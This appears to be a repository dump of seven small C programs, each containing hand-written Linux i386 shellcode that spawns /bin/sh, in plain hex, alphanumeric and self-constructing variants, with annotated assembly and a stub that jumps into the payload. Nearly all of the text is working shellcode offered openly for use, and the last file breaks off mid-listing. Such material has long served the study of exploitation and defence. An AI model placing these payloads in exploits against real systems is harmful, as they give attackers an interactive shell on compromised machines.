├── buffer-i386-alpha.c ├── buffer-i386-cool.c ├── buffer-i386-crazy.c ├── buffer-i386-delirium.c ├── buffer-i386-raptus.c ├── buffer-i386-reallycool.c └── buffer-i386-short.c /buffer-i386-alpha.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | */ 30 | 31 | char shellcode[] = "LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5ECfPDVUajcX0Dob0T" 32 | "odjdY0LohfhmNfXf1Dol0topjYY0Loq0toq0totjJX0Dou0tou0TovjFX0Do" 33 | "w0towjhXfRhnKshhBabivERSvT29"; 34 | 35 | main() { 36 | long *ret; 37 | 38 | ret = (long *)&ret + 2; 39 | (*ret) = (long)shellcode; 40 | 41 | } 42 | 43 | -------------------------------------------------------------------------------- /buffer-i386-cool.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTR@CT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | * 30 | * 80483c3: 31 d2 xor %edx,%edx 31 | * 80483c5: 52 push %edx 32 | * 80483c6: 68 6e 2f 73 68 push $0x68732f6e 33 | * 80483cb: 68 2f 2f 62 69 push $0x69622f2f 34 | * 80483d0: 89 e3 mov %esp,%ebx 35 | * 80483d2: 52 push %edx 36 | * 80483d3: 53 push %ebx 37 | * 80483d4: 89 e1 mov %esp,%ecx 38 | * 80483d6: 6a 0b push $0xb 39 | * 80483d8: 51 push %ecx 40 | * 80483d9: 52 push %edx 41 | * 80483da: 53 push %ebx 42 | * 80483db: 83 ec 10 sub $0x10,%esp 43 | * 80483de: 61 popa 44 | * 80483df: cd 80 int $0x80 45 | * 46 | */ 47 | 48 | char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" 49 | "\x52\x53\x89\xe1\x6a\x0b\x51\x52\x53\x83\xec\x10\x61\xcd\x80"; 50 | 51 | main() { 52 | long *ret; 53 | 54 | ret = (long *)&ret + 2; 55 | (*ret) = (long)shellcode; 56 | 57 | } 58 | 59 | -------------------------------------------------------------------------------- /buffer-i386-crazy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | */ 30 | 31 | char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68" 32 | "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1" 33 | "THREE.RULES.TO.CODE.COOL.SHELLCODES" 34 | "\x44\x44\x83\xc4\x20\x40\x40\x80\xeb\x03\x66" 35 | "\x83\xc7\x05\x66\x83\xed\x06\x51" 36 | "IF.LIFE.IS.SHORT.YOUR.SHELLCODE.SHOULD.BE.SHORTER" 37 | "\x44\x44\x83\xc4\x30\x59\x04\x04\x4b\x4a\x4e" 38 | "\x4e\x66\x83\xc7\x05\x66\x83\xed\x05\x51" 39 | "NEVER.THINK.ABOUT.YOUR.MOMMY.WHILE.CODING" 40 | "\x83\xc4\x18\x59\x40\x40\x4a\x66\x83\xc6\x03" 41 | "\x66\x83\xc7\x03\x55" 42 | "DONT.TOUCH.REGISTERS.TITS.ARE.BETTER" 43 | "\x4c\x83\xc4\x3c\x40\x4b\x41\x4a\x46\x47\x66" 44 | "\x83\xed\x05\xcd\x80"; 45 | 46 | main() { 47 | long *ret; 48 | 49 | ret = (long *)&ret + 2; 50 | (*ret) = (long)shellcode; 51 | 52 | } 53 | 54 | -------------------------------------------------------------------------------- /buffer-i386-delirium.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2003 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | */ 30 | 31 | 32 | /* 33 | * This is an alphanumeric code completely written by hand which builds a 34 | * shellcode and then executes it. It can be considered as the evolution 35 | * of buffer-i386-raptus.c. Infact, in that shellcode, just the last asm 36 | * instruction (int $0x80) is built at run-time. Here anything is built 37 | * at run-time! Just a nice delirium, isn't it?! 8) 38 | * This code was developed using Fenris by Michael Zalewski which helped 39 | * me too much during development. As you can see from comments below, 40 | * this shellcode works fine if __GNUC__ < 3. This is due to optimizations 41 | * introduced by gcc with __GNUC__ 3. At this moment it's not available 42 | * a version for such compilers but probably it will happen in the next 43 | * future. Have fun! 44 | */ 45 | 46 | #include 47 | 48 | main() 49 | { 50 | 51 | 52 | #if GCC_VERSION < 3000 53 | 54 | 55 | long *ret; 56 | char shellcode[] = "h3Zo0" // 68 33 5a 6f 30 push $0x306f5a33 57 | "X" // 58 pop %eax 58 | "5YQ7O" // 35 59 51 37 4f xor $0x4f375159,%eax 59 | "P" // 50 push %eax 60 | "D" // 44 inc %esp 61 | "D" // 44 inc %esp 62 | "D" // 44 inc %esp 63 | "Y" // 59 pop %ecx 64 | "A" // 41 inc %ecx 65 | "A" // 41 inc %ecx 66 | "A" // 41 inc %ecx 67 | "A" // 41 inc %ecx 68 | "A" // 41 inc %ecx 69 | "A" // 41 inc %ecx 70 | "A" // 41 inc %ecx 71 | "A" // 41 inc %ecx 72 | "A" // 41 inc %ecx 73 | "A" // 41 inc %ecx 74 | "A" // 41 inc %ecx 75 | "A" // 41 inc %ecx 76 | "A" // 41 inc %ecx 77 | "A" // 41 inc %ecx 78 | "A" // 41 inc %ecx 79 | "A" // 41 inc %ecx 80 | "A" // 41 inc %ecx 81 | "A" // 41 inc %ecx 82 | "A" // 41 inc %ecx 83 | "A" // 41 inc %ecx 84 | "A" // 41 inc %ecx 85 | "A" // 41 inc %ecx 86 | "A" // 41 inc %ecx 87 | "A" // 41 inc %ecx 88 | "A" // 41 inc %ecx 89 | "A" // 41 inc %ecx 90 | "Q" // 51 push %ecx 91 | "L" // 4c dec %esp 92 | "L" // 4c dec %esp 93 | "L" // 4c dec %esp 94 | "Y" // 59 pop %ecx 95 | "hfXZn" // 68 66 58 5a 6e push $0x6e565866 96 | "X" // 58 pop %eax 97 | "5404A" // 35 34 30 34 41 xor $0x41343034,%eax 98 | "P" // 50 push %eax 99 | "Z" // 5a pop %edx 100 | "hGXXn" // 68 47 58 58 6e push $0x6e585847 101 | "X" // 58 pop %eax 102 | "5400A" // 35 34 30 30 41 xor $0x41303034,%eax 103 | "L" // 4c dec %esp 104 | "L" // 4c dec %esp 105 | "L" // 4c dec %esp 106 | "P" // 50 push %eax 107 | "R" // 52 push %edx 108 | "Q" // 51 push %ecx 109 | "D" // 44 inc %esp 110 | "D" // 44 inc %esp 111 | "D" // 44 inc %esp 112 | "D" // 44 inc %esp 113 | "D" // 44 inc %esp 114 | "D" // 44 inc %esp 115 | "D" // 44 inc %esp 116 | "D" // 44 inc %esp 117 | "D" // 44 inc %esp 118 | "D" // 44 inc %esp 119 | "D" // 44 inc %esp 120 | "D" // 44 inc %esp 121 | "D" // 44 inc %esp 122 | "D" // 44 inc %esp 123 | "D" // 44 inc %esp 124 | "D" // 44 inc %esp 125 | "hn000" // 68 6e 30 30 30 push $0x3030306e 126 | "X" // 58 pop %eax 127 | "5ARYO" // 35 41 52 59 4f xor $0x4f595241,%eax 128 | "P" // 50 push %eax 129 | "D" // 44 inc %esp 130 | "D" // 44 inc %esp 131 | "D" // 44 inc %esp 132 | "Y" // 59 pop %ecx 133 | "A" // 41 inc %ecx 134 | "A" // 41 inc %ecx 135 | "A" // 41 inc %ecx 136 | "A" // 41 inc %ecx 137 | "A" // 41 inc %ecx 138 | "A" // 41 inc %ecx 139 | "A" // 41 inc %ecx 140 | "A" // 41 inc %ecx 141 | "A" // 41 inc %ecx 142 | "A" // 41 inc %ecx 143 | "Q" // 51 push %ecx 144 | "D" // 44 inc %esp 145 | "D" // 44 inc %esp 146 | "D" // 44 inc %esp 147 | "D" // 44 inc %esp 148 | "D" // 44 inc %esp 149 | "h0000" // 68 30 30 30 30 push $0x30303030 150 | "X" // 58 pop %eax 151 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 152 | "H" // 48 dec %eax 153 | "H" // 48 dec %eax 154 | "H" // 48 dec %eax 155 | "H" // 48 dec %eax 156 | "H" // 48 dec %eax 157 | "H" // 48 dec %eax 158 | "H" // 48 dec %eax 159 | "H" // 48 dec %eax 160 | "H" // 48 dec %eax 161 | "H" // 48 dec %eax 162 | "H" // 48 dec %eax 163 | "H" // 48 dec %eax 164 | "H" // 48 dec %eax 165 | "H" // 48 dec %eax 166 | "H" // 48 dec %eax 167 | "H" // 48 dec %eax 168 | "H" // 48 dec %eax 169 | "H" // 48 dec %eax 170 | "H" // 48 dec %eax 171 | "H" // 48 dec %eax 172 | "H" // 48 dec %eax 173 | "H" // 48 dec %eax 174 | "H" // 48 dec %eax 175 | "H" // 48 dec %eax 176 | "H" // 48 dec %eax 177 | "H" // 48 dec %eax 178 | "H" // 48 dec %eax 179 | "H" // 48 dec %eax 180 | "H" // 48 dec %eax 181 | "P" // 50 push %eax 182 | "D" // 44 inc %esp 183 | "D" // 44 inc %esp 184 | "D" // 44 inc %esp 185 | "D" // 44 inc %esp 186 | "D" // 44 inc %esp 187 | "P" // 50 push %eax 188 | "Z" // 5a pop %edx 189 | "hffff" // 68 66 66 66 66 push $66666666 190 | "X" // 58 pop %eax 191 | "54545" // 35 34 35 34 35 xor $0x35343534,%eax 192 | "P" // 50 push %eax 193 | "D" // 44 inc %esp 194 | "D" // 44 inc %esp 195 | "D" // 44 inc %esp 196 | "D" // 44 inc %esp 197 | "D" // 44 inc %esp 198 | "D" // 44 inc %esp 199 | "Q" // 51 push %ecx 200 | "J" // 4a dec %edx 201 | "J" // 4a dec %edx 202 | "D" // 44 inc %esp 203 | "D" // 44 inc %esp 204 | "D" // 44 inc %esp 205 | "D" // 44 inc %esp 206 | "D" // 44 inc %esp 207 | "R" // 52 push %edx 208 | "D" // 44 inc %esp 209 | "D" // 44 inc %esp 210 | "D" // 44 inc %esp 211 | "D" // 44 inc %esp 212 | "D" // 44 inc %esp 213 | "h0000" // 68 30 30 30 30 push $0x30303030 214 | "X" // 58 pop %eax 215 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 216 | "H" // 48 dec %eax 217 | "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax 218 | "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax 219 | "P" // 50 push %eax 220 | "D" // 44 inc %esp 221 | "D" // 44 inc %esp 222 | "D" // 44 inc %esp 223 | "D" // 44 inc %esp 224 | "D" // 44 inc %esp 225 | "D" // 44 inc %esp 226 | "D" // 44 inc %esp 227 | "D" // 44 inc %esp 228 | "D" // 44 inc %esp 229 | "D" // 44 inc %esp 230 | "D" // 44 inc %esp 231 | "D" // 44 inc %esp 232 | "D" // 44 inc %esp 233 | "D" // 44 inc %esp 234 | "D" // 44 inc %esp 235 | "D" // 44 inc %esp 236 | "D" // 44 inc %esp 237 | "D" // 44 inc %esp 238 | "D" // 44 inc %esp 239 | "D" // 44 inc %esp 240 | "D" // 44 inc %esp 241 | "D" // 44 inc %esp 242 | "D" // 44 inc %esp 243 | "D" // 44 inc %esp 244 | "H" // 48 dec %eax 245 | ; 246 | 247 | 248 | ret = (long *)&ret + 2; 249 | (*ret) = (long)shellcode; 250 | 251 | #else 252 | # error "This shellcode doesn't work if compiled with gcc-3.x. " 253 | # error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...." 254 | #endif 255 | 256 | } 257 | 258 | -------------------------------------------------------------------------------- /buffer-i386-raptus.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2003 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | */ 30 | 31 | 32 | /* 33 | * This is an alphanumeric shellcode completely written by hand. It was 34 | * developed using Fenris by Michael Zalewski which helped me too much 35 | * during development. As you can see from comments below, this shellcode 36 | * works fine if __GNUC__ < 3. This is due to optimizations introduced by 37 | * gcc with __GNUC__ 3. At this moment it's not available a version for 38 | * such compilers but probably it will happen in the next future. 39 | * 40 | * Thanks : 41 | * ALoR - he suggested to me the idea of 'pushing the unobtainable' 8) 42 | * 43 | */ 44 | 45 | 46 | #include 47 | 48 | main() 49 | { 50 | 51 | #if GCC_VERSION < 3000 52 | 53 | long *ret; 54 | char shellcode[] = "h0000" // 68 30 30 30 30 push $0x30303030 55 | "X" // 58 pop %eax 56 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 57 | "H" // 48 dec %eax 58 | "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax 59 | "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax 60 | "L" // 4c dec %esp 61 | "L" // 4c dec %esp 62 | "L" // 4c dec %esp 63 | "L" // 4c dec %esp 64 | "L" // 4c dec %esp 65 | "L" // 4c dec %esp 66 | "L" // 4c dec %esp 67 | "L" // 4c dec %esp 68 | "L" // 4c dec %esp 69 | "L" // 4c dec %esp 70 | "L" // 4c dec %esp 71 | "P" // 50 push %eax 72 | "D" // 44 inc %esp 73 | "D" // 44 inc %esp 74 | "D" // 44 inc %esp 75 | "D" // 44 inc %esp 76 | "D" // 44 inc %esp 77 | "D" // 44 inc %esp 78 | "D" // 44 inc %esp 79 | "D" // 44 inc %esp 80 | "D" // 44 inc %esp 81 | "D" // 44 inc %esp 82 | "D" // 44 inc %esp 83 | "D" // 44 inc %esp 84 | "D" // 44 inc %esp 85 | "D" // 44 inc %esp 86 | "D" // 44 inc %esp 87 | "D" // 44 inc %esp 88 | "D" // 44 inc %esp 89 | "D" // 44 inc %esp 90 | "D" // 44 inc %esp 91 | "D" // 44 inc %esp 92 | "D" // 44 inc %esp 93 | "D" // 44 inc %esp 94 | "D" // 44 inc %esp 95 | "D" // 44 inc %esp 96 | "D" // 44 inc %esp 97 | "D" // 44 inc %esp 98 | "D" // 44 inc %esp 99 | "D" // 44 inc %esp 100 | "D" // 44 inc %esp 101 | "D" // 44 inc %esp 102 | "D" // 44 inc %esp 103 | "D" // 44 inc %esp 104 | "D" // 44 inc %esp 105 | "D" // 44 inc %esp 106 | "D" // 44 inc %esp 107 | "D" // 44 inc %esp 108 | "D" // 44 inc %esp 109 | "D" // 44 inc %esp 110 | "D" // 44 inc %esp 111 | "D" // 44 inc %esp 112 | "D" // 44 inc %esp 113 | "D" // 44 inc %esp 114 | "D" // 44 inc %esp 115 | "D" // 44 inc %esp 116 | "D" // 44 inc %esp 117 | "D" // 44 inc %esp 118 | "D" // 44 inc %esp 119 | "D" // 44 inc %esp 120 | "D" // 44 inc %esp 121 | "D" // 44 inc %esp 122 | "D" // 44 inc %esp 123 | "D" // 44 inc %esp 124 | "D" // 44 inc %esp 125 | "D" // 44 inc %esp 126 | "D" // 44 inc %esp 127 | "D" // 44 inc %esp 128 | "D" // 44 inc %esp 129 | "D" // 44 inc %esp 130 | "D" // 44 inc %esp 131 | "hZZZZ" // 68 5a 5a 5a 5a push $0x5a5a5a5a 132 | "X" // 58 pop %eax 133 | "5ZZZZ" // 35 5a 5a 5a 5a xor $0x5a5a5a5a,%eax 134 | "P" // 50 push %eax 135 | "hn0sh" // 68 6e 30 73 68 push $0x6873306e 136 | "D" // 44 inc %esp 137 | "Y" // 59 pop %ecx 138 | "I" // 49 dec %ecx 139 | "Q" // 51 push %ecx 140 | "L" // 4c dec %esp 141 | "h00bi" // 68 30 30 62 69 push $0x69623030 142 | "Y" // 59 pop %ecx 143 | "I" // 49 dec %ecx 144 | "Q" // 51 push %ecx 145 | "D" // 44 inc %esp 146 | "Y" // 59 pop %ecx 147 | "I" // 49 dec %ecx 148 | "Q" // 51 push %ecx 149 | "L" // 4c dec %esp 150 | "T" // 54 push %esp 151 | "Z" // 5a pop %edx 152 | "P" // 50 push %eax 153 | "R" // 52 push %edx 154 | "T" // 54 push %esp 155 | "Y" // 59 pop %ecx 156 | "hXPPP" // 68 58 50 50 50 push $0x50505058 157 | "X" // 58 pop %eax 158 | "5SPPP" // 35 53 50 50 50 xor $0x50505053,%eax 159 | "P" // 50 push %eax 160 | "h0000" // 68 30 30 30 30 push $0x30303030 161 | "X" // 58 pop %eax 162 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 163 | "Q" // 51 push %ecx 164 | "P" // 50 push %eax 165 | "R" // 52 push %edx 166 | "U" // 55 push %ebp 167 | "T" // 54 push %esp 168 | "V" // 56 push %esi 169 | "W" // 57 push %edi 170 | "a"; // 61 popa 171 | 172 | 173 | ret = (long *)&ret + 2; 174 | (*ret) = (long)shellcode; 175 | 176 | #else 177 | # error "This shellcode doesn't work if compiled with gcc-3.x. " 178 | # error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...." 179 | #endif 180 | 181 | } 182 | 183 | -------------------------------------------------------------------------------- /buffer-i386-reallycool.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | * 30 | * 80483c3: 6a 0b push $0xb 31 | * 80483c5: 58 pop %eax 32 | * 80483c6: 99 cltd 33 | * 80483c7: 52 push %edx 34 | * 80483c8: 68 6e 2f 73 68 push $0x68732f6e 35 | * 80483cd: 68 2f 2f 62 69 push $0x69622f2f 36 | * 80483d2: 89 e3 mov %esp,%ebx 37 | * 80483d4: 50 push %eax 38 | * 80483d5: 8d 4c 24 f4 lea 0xfffffff4(%esp,1),%ecx 39 | * 80483d9: 51 push %ecx 40 | * 80483da: 52 push %edx 41 | * 80483db: 53 push %ebx 42 | * 80483dc: 83 ec 10 sub $0x10,%esp 43 | * 80483df: 61 popa 44 | * 80483e0: cd 80 int $0x80 45 | * 46 | */ 47 | 48 | char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" 49 | "\x50\x8d\x4c\x24\xf4\x51\x52\x53\x83\xec\x10\x61\xcd\x80"; 50 | 51 | main() { 52 | long *ret; 53 | 54 | ret = (long *)&ret + 2; 55 | (*ret) = (long)shellcode; 56 | 57 | } 58 | 59 | -------------------------------------------------------------------------------- /buffer-i386-short.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * Alberto Ornaghi 6 | * 7 | * All rights reserved. 8 | * 9 | * Redistribution and use in source and binary forms, with or without 10 | * modification, are permitted provided that the following conditions 11 | * are met: 12 | * 1. Redistributions of source code must retain the above copyright 13 | * notice, this list of conditions and the following disclaimer. 14 | * 2. Redistributions in binary form must reproduce the above copyright 15 | * notice, this list of conditions and the following disclaimer in the 16 | * documentation and/or other materials provided with the distribution. 17 | * 18 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 19 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 20 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 21 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 22 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 23 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 24 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 25 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 26 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 27 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 28 | * SUCH DAMAGE. 29 | * 30 | * 31 | * 80483c3: 6a 0b push $0xb 32 | * 80483c5: 58 pop %eax 33 | * 80483c6: 99 cltd 34 | * 80483c7: 52 push %edx 35 | * 80483c8: 68 6e 2f 73 68 push $0x68732f6e 36 | * 80483cd: 68 2f 2f 62 69 push $0x69622f2f 37 | * 80483d2: 89 e3 mov %esp,%ebx 38 | * 80483d4: 52 push %edx 39 | * 80483d5: 53 push %ebx 40 | * 80483d6: 89 e1 mov %esp,%ecx 41 | * 80483d8: cd 80 int $0x80 42 | * 43 | */ 44 | 45 | char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68" 46 | "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89" 47 | "\xe1\xcd\x80"; 48 | 49 